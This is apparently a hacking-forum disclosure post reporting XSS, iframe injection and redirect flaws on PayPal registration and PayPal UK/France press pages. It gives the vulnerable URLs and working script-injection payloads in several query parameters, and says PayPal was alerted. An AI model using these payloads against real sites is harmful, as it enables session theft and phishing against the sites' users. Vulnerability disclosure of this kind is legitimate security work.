Nemesis Our Projects Forums Extra Controls
  RegMe



PayPal again vulnerable to XSS



Paypal.com

Registration paypal.com vulnerable to XSS ,Iframe Injection  and Redirect

Vulnerable page:-

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country=


POC:-

Code:
https://registration.paypal.com/welcomePage.do?partner=PayPalUK&bundleCode=C3&country="><script>alert(String.fromCharCode(88,83,83))</script>

then CLICK continue


http://img9.imageshack.us/img9/3801/89855532.jpg

http://img9.imageshack.us/img9/8461/54961825.jpg

http://img9.imageshack.us/img9/1530/28942901.jpg

Proof of concept  Video Demonstration

http://www.youtube.com/watch?v=wRYGFomNtz4


PayPal UK MediaCenter - XSS ,Iframe injection and Redirect
  
Iframe and Redirect on search module.
http://img239.imageshack.us/img239/1594/26271935.jpg  

XSS

Code:
https://www.paypal-press.co.uk/content/default.asp?NewsAreaID=2&LocaleID='"></title><script>alert(Methodman)</script>><marquee><h1>XSS</h1></marquee>


Code:
https://www.paypal-press.co.uk/imagelibrary/detail.asp?MediaDetailsID="'/><script>alert(String.fromCharCode(88,83,83))</script>



The same problem also on https://www.paypal-press.fr
http://img168.imageshack.us/img168/7154/78264670.jpg

Paypal Staff has been alerted about this.
Warning ! This is only a Proof of Concept So We Will Not Be Responsible for Any Damage


Submitted by [-TE-]-Methodman


No Comments


You need to be logged in to be able to post comments